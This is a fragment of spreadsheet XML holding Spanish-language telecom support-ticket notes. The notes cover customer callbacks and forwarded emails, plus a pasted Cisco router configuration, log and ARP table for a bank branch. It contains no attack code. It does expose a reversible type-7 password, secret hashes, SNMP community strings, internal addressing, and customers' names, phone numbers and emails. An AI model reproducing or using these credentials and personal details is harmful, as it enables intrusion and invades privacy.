    <t>F4576278</t>
  </si>
  <si>
    <t>***--- SE HABLA CON MARCO ROSAS (CLIENTE) SE LE INDICA QUE SE ESTA UBICANDO EL SITIO EXACTO DEL DAÑO YA QUE ES EN FOSOS Y AVANCES EN 40 MINUTOS TOMANDO EN CUENTA LOS TIEMPOS QUE PIDEN LOS TÉCNICOS  -*--**</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A MARCO ROSAS/CLIENTE; SE INFORMA ENLACE AFECTADO POR CORTE DE FO EN SECTOR, AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A MARCO ROSAS/CLIENTE, SE LE INDICA QUE SE COORDINA VISITA TÉCNICA; CLIENTE PIDE SE LE INFORME DATOS DEL PERSONAL TÉCNICO QUE ATENDERA, NOMBRE/IBM/DPI. SE INFORMA DE LO DICHO POR CLIENTE A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4576280</t>
  </si>
  <si>
    <t>F4576283</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO BENEDETTI AL 25241390  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001050548
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO BENEDETTI AL 77873311 / 25241390 NO RESPONDE EN EL PRIMER NUMERO Y EN EL SEGUNDO INDICA QUE SE LE LLAME EN 10 MIN QUE REALIZARA PRUEBAS **
ID 2001044565
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RODRIGO, QUIEN INDICA QUE CUANDO ABRIO EL TICKET NO TENIA LLAMADAS.
REALIZA UNA PRUEBA DE LLAMADA Y ESTA COMPLETA.
SOLICITA QUE SE LE LLAME EL DIA DE MAÑANA A LAS 8:00AM PARA VALIDAR EL SERVICIO
2001024420
COLA:
NOMBRE: A: 0050377873311
NÚMERO: 0050377873311
DURACIÓN: 0:00:13
ESTADO: MARCANDO
DETALLES: 0050377873311
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/05/2022 19:08:42
CALL DESCRIPTION
DIR USER-TERM                    STATUS       LOCAL-NUMBER         REMOTE-NUMBER        CODEC
IN  ISDN-PRI-LINE-1              LOC.RINGING  +50321320100         25241390
STATUS OF CALL-MNG
CALL DESCRIPTION
TRUNK             DIR USER-TERM                    STATUS       LOCAL-NUMBER         REMOTE-NUMBER        CODEC
SIP-BENEDETTI     IN  ISDN-PRI-LINE-1              LOC.RINGING  +50321320100         25241390
COMMAND EXECUTED</t>
  </si>
  <si>
    <t>F4576284</t>
  </si>
  <si>
    <t>***--- SE LLAMA A WALTER REYES 45787911 (CLIENTE)  NO CONTESTA POR LO QUE SE DEBE LLAMAR LUEGO ---***
2001036226</t>
  </si>
  <si>
    <t>***-SE LLAMA A CLIENTE WALTER REYES 45787911 NO CONTESTA SE INTENTARA LUEGO ***
2001062777
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO ENRIQUE ARGUETA GIRON AL 55109103 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001041108
**</t>
  </si>
  <si>
    <t>F4576287</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 21:10
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RICARDO ENRIQUE ARGUETA GIRON &lt;RICARDO.ARGUETAG@SOMOSCMI.COM&gt;
CC: ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; LESTER IVAN KROLIK MORALES &lt;LESTER.KROLIK@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;
ASUNTO: RE: INGENIERÍA MENOR, HABILITACIÓN DE PUERTOS LAN
BUENAS NOCHES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO SE ENVÍAN LAS PRUEBAS REQUERIDAS PARA EL 829800068T. SALUDOS CORDIALES.
FIGURA 1. PUERTOS ACTIVOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  WALTER REYES 45787911   NO CONTESTA , SE INTENTARA LUEGO ***
2001041481
**</t>
  </si>
  <si>
    <t>F4576296</t>
  </si>
  <si>
    <t>**SE LE LLAMA A  EDGAR GUZMÁN AL  502 3048 1583  NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001115050
**</t>
  </si>
  <si>
    <t>SE3 ENVIA CORREO AL CLIENTE PARA SOLICITAR CONTACTO EN SITIO PARA REALIZAR DESCARTES DE 1 ER NIVEL A ESPERA DE RESPUESTA DEL CLIENTE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 20:06
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; RICARDO PEREZ MENDOZA &lt;RIPEREZ@ELEKTRA.COM.MX&gt;; HELPDESK.GT@TELEFONICA.COM &lt;HELPDESK.GT@TELEFONICA.COM&gt;; ELDER GIOVANY ALARCON HERNANDEZ &lt;ELDER.ALARCON@CLARO.COM.GT&gt;
CC: MIGUEL RUIZ GONZALEZ &lt;MRUIZ@ELEKTRA.COM.MX&gt;; EDGAR FERNANDO GUZMAN RAXON &lt;EFGUZMAN@BANCOAZTECA.COM.GT&gt;; CENTRO DE ATENCION DE ENLACES &lt;CAE@AZTECASERVICIOS.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: 9428 - DON LEON QUETZALTENANGO || ID: C-0026405701 || SERVICIO INACTIVO PARA BANCO AZTECA
ESTIMADO CLIENTE CON EL SEGUIMIENTO AL ENLACE CAIDO LE SOLICITAMOS SU APOYO PARA PODER REALIZAR PRUEBAS DE 1ER NIVEL EN EL PUNTO REMOTO SERIA POSIBLE QUE NOS PROPORCIANARAN ALGUN CONTACTO EN SITIO PARA REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>F4576309</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR JUAN HERNANDEZ  E INDICA QUE EL TICKET DE SU LADO YA FUE CERRADO POR SU COMPAÑERO SERGIO GARCIA . AUTORIZA CIERRE DE TICKET **
ID 2001041764
**</t>
  </si>
  <si>
    <t>F4576315</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 50424182202, +50432431287 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001044028 - 2001044054
**</t>
  </si>
  <si>
    <t>F4576327</t>
  </si>
  <si>
    <t xml:space="preserve">SE VALIDA EN EL EQUIPO CPE QUE SE TIENE INESTABILIDAD SE PORCEDERA A VALIDAR CAUSA.
MAY 24 21:39:24.930 GUA: %LINK-5-CHANGED: INTERFACE VLAN1, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 24 21:39:25.930 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
MAY 24 21:39:35.726 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (190.56.58.197)
MAY 24 21:40:00.434 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 24 21:40:01.434 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
MAY 24 21:40:02.994 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (190.56.58.197)
MAY 24 21:48:24.930 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY0 (190.56.58.197)
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
SHOW CLOCK
22:48:22.793 GUA TUE MAY 24 2022
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
SE TIENE COMUNICACIÓN CON PERDIDAS AL ROUTER CPE | ENLACE INESTABLE.
ROUTER CPE ACTIVO HACE 1 SEMANA.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M7, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED MON 16-SEP-13 00:15 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M9, RELEASE SOFTWARE (FC1)
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T UPTIME IS 1 WEEK, 6 DAYS, 2 HOURS, 37 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 20:10:32 GUA WED MAY 11 2022
SYSTEM IMAGE FILE IS "FLASH:C1900-UNIVERSALK9-MZ.SPA.151-4.M7.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4801L
4 FASTETHERNET INTERFACES
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
255744K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1534801L
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5884 BYTES
!
! LAST CONFIGURATION CHANGE AT 21:48:24 GUA TUE MAY 24 2022 BY GESTIONIP
VERSION 15.1
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T
!
BOOT-START-MARKER
BOOT SYSTEM FLASH:C1900-UNIVERSALK9-MZ.SPA.151-4.M7.BIN
BOOT SYSTEM FLASH:C1900-UNIVERSALK9-MZ.SPA.151-3.T1.BIN
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1534801L
!
!
USERNAME ELEKTRA PRIVILEGE 10 PASSWORD 7 01360A01501F142F
USERNAME ELEKTRACLARO PRIVILEGE 2 SECRET 4 ZN94VNGVWGFBBNVOSSZM.RGBGNAURUKAOTO/E0YXXUI
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.109.32 255.255.255.255
!
INTERFACE LOOPBACK100
 DESCRIPTION SOURCE TUNNEL
 IP ADDRESS 10.145.0.74 255.255.255.255
!
INTERFACE TUNNEL0
 DESCRIPTION PRINCIPAL CLARO
 BANDWIDTH 2048
 IP ADDRESS 10.145.6.74 255.255.255.252
 IP OSPF MTU-IGNORE
 TUNNEL SOURCE 10.145.0.74
 TUNNEL DESTINATION 10.145.0.253
!
INTERFACE TUNNEL1
 DESCRIPTION REDUNDANCIA SATELITAL
 BANDWIDTH 2048
 IP ADDRESS 10.145.6.78 255.255.255.252
 IP OSPF COST 5000
 IP OSPF MTU-IGNORE
 TUNNEL SOURCE 10.145.0.74
 TUNNEL DESTINATION 10.145.0.254
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/265900146T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.103.10.196 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE SATELITAL
 IP ADDRESS 10.6.13.198 255.255.255.192
 IP NAT OUTSIDE
 IP VIRTUAL-REASSEMBLY IN
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0/0/0
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/1
 DESCRIPTION INTERFAZ SIN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/2
 DESCRIPTION INTERFAZ SIN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/3
 DESCRIPTION INTERFAZ SIN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 5120
 IP ADDRESS 10.145.22.129 255.255.255.252
 IP FLOW INGRESS
 IP FLOW EGRESS
 IP NAT INSIDE
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 SHUTDOWN
!
ROUTER OSPF 1
 ROUTER-ID 10.145.0.74
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 REDISTRIBUTE STATIC SUBNETS ROUTE-MAP STATIC
 NETWORK 10.145.6.72 0.0.0.3 AREA 2
 NETWORK 10.145.6.76 0.0.0.3 AREA 2
 DISTRIBUTE-LIST PREFIX DEFAULT IN
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 30
 SORT-BY BYTES
 CACHE-TIMEOUT 30
!
IP NAT INSIDE SOURCE STATIC 10.44.56.7 10.6.13.193
IP NAT INSIDE SOURCE STATIC 10.44.56.10 10.6.13.200
IP NAT INSIDE SOURCE STATIC 10.44.56.11 10.6.13.201
IP NAT INSIDE SOURCE STATIC 10.44.56.12 10.6.13.202
IP NAT INSIDE SOURCE STATIC 10.44.56.13 10.6.13.203
IP NAT INSIDE SOURCE STATIC 10.44.56.15 10.6.13.204
IP NAT INSIDE SOURCE STATIC 10.44.56.16 10.6.13.205
IP NAT INSIDE SOURCE STATIC 10.44.56.17 10.6.13.206
IP NAT INSIDE SOURCE STATIC 10.44.56.21 10.6.13.207
IP NAT INSIDE SOURCE STATIC 10.44.56.22 10.6.13.208
IP NAT INSIDE SOURCE STATIC 10.44.56.19 10.6.13.209
IP NAT INSIDE SOURCE STATIC 10.44.56.20 10.6.13.210
IP NAT INSIDE SOURCE STATIC 10.44.56.23 10.6.13.211
IP NAT INSIDE SOURCE STATIC 10.44.56.24 10.6.13.212
IP NAT INSIDE SOURCE STATIC 10.44.56.25 10.6.13.213
IP ROUTE 0.0.0.0 0.0.0.0 10.6.13.197 200 NAME REDUNDANTE
IP ROUTE 10.44.56.0 255.255.255.224 10.145.22.130 NAME SD1012438
IP ROUTE 10.145.0.253 255.255.255.255 10.103.10.193 NAME TUN0
IP ROUTE 10.145.0.254 255.255.255.255 10.103.10.193 NAME TUN1
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.44.56.0/27
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.145.22.128/30
!
IP PREFIX-LIST DEFAULT SEQ 5 PERMIT 0.0.0.0/0
!
IP PREFIX-LIST STATIC SEQ 5 PERMIT 10.44.56.0/27
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
ROUTE-MAP STATIC PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST STATIC
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY MONITORBAZ RO
SNMP-SERVER COMMUNITY MON002659D RO
SNMP-SERVER COMMUNITY REDESLAM RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION CALLE PRINCIPAL LOTE 271 FRAY BARTOLOME DE LAS CASAS ALTA VERAPAZ
!
CONTROL-PLANE
!
!
PRIVILEGE EXEC LEVEL 2 SHOW STARTUP-CONFIG
PRIVILEGE EXEC LEVEL 2 SHOW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END
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 53 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 53 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 57 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.411: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
MAY 12 02:10:48.559: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
MAY 12 02:10:53.063: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO RESET
MAY 12 02:10:53.063: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO RESET
MAY 12 02:10:54.051: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
MAY 12 02:10:54.259: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 12 02:10:54.259: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 12 02:10:55.099: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 12 02:10:55.099: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 11 20:10:55.235 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 02:10:55 UTC THU MAY 12 2022 TO 20:10:55 GUA WED MAY 11 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
MAY 11 20:10:56.283 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
MAY 11 20:10:56.283 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK100, CHANGED STATE TO UP
MAY 11 20:10:56.283 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL0, CHANGED STATE TO DOWN
MAY 11 20:10:56.283 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL1, CHANGED STATE TO DOWN
MAY 11 20:10:56.463 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE NVI0, CHANGED STATE TO UP
MAY 11 20:10:57.283 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 11 20:10:57.291 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 11 20:10:58.291 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
MAY 11 20:10:58.291 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 11 20:11:01.339 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
MAY 11 20:11:01.899 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 11 20:11:02.911 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 11 20:11:03.247 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 11 20:11:03.247 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 11 20:11:03.247 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 11 20:11:03.887 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M7, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED MON 16-SEP-13 00:15 BY PROD_REL_TEAM
MAY 11 20:11:04.067 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T IS UNDERGOING A COLD START
MAY 11 20:11:04.683 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
MAY 11 20:11:04.683 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
MAY 11 20:11:04.683 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO DOWN
MAY 11 20:11:04.683 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
MAY 11 20:11:05.263 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL0, CHANGED STATE TO UP
MAY 11 20:11:05.275 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL1, CHANGED STATE TO UP
MAY 11 20:11:19.999 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.253 ON TUNNEL0 FROM LOADING TO FULL, LOADING DONE
MAY 11 20:11:24.791 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.254 ON TUNNEL1 FROM LOADING TO FULL, LOADING DONE
MAY 11 20:14:15.651 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
MAY 11 20:14:16.651 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
MAY 11 20:14:30.371 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
MAY 11 20:14:31.375 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
MAY 11 20:16:06.675 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
MAY 11 20:16:07.675 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
MAY 11 20:16:35.683 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
MAY 20 00:02:56.463 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.253 ON TUNNEL0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 20 00:03:20.607 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.253 ON TUNNEL0 FROM LOADING TO FULL, LOADING DONE
MAY 20 22:11:24.185 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.254 ON TUNNEL1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 20 22:11:24.745 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.145.0.254 ON TUNNEL1 FROM LOADING TO FULL, LOADING DONE
MAY 24 21:39:24.930 GUA: %LINK-5-CHANGED: INTERFACE VLAN1, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 24 21:39:25.930 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
MAY 24 21:39:35.726 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (190.56.58.197)
MAY 24 21:40:00.434 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 24 21:40:01.434 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
MAY 24 21:40:02.994 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (190.56.58.197)
MAY 24 21:48:24.930 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY0 (190.56.58.197)
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
SHOW CLOCK
22:48:22.793 GUA TUE MAY 24 2022
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.6.13.193             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.198             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.200             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.201             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.202             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.203             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.204             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.205             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.206             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.207             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.208             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.209             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.210             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.211             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.212             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.6.13.213             -   30E4.DBC4.B041  ARPA   GIGABITETHERNET0/1
INTERNET  10.103.10.193           2   084F.0AC8.68CD  ARPA   GIGABITETHERNET0/0
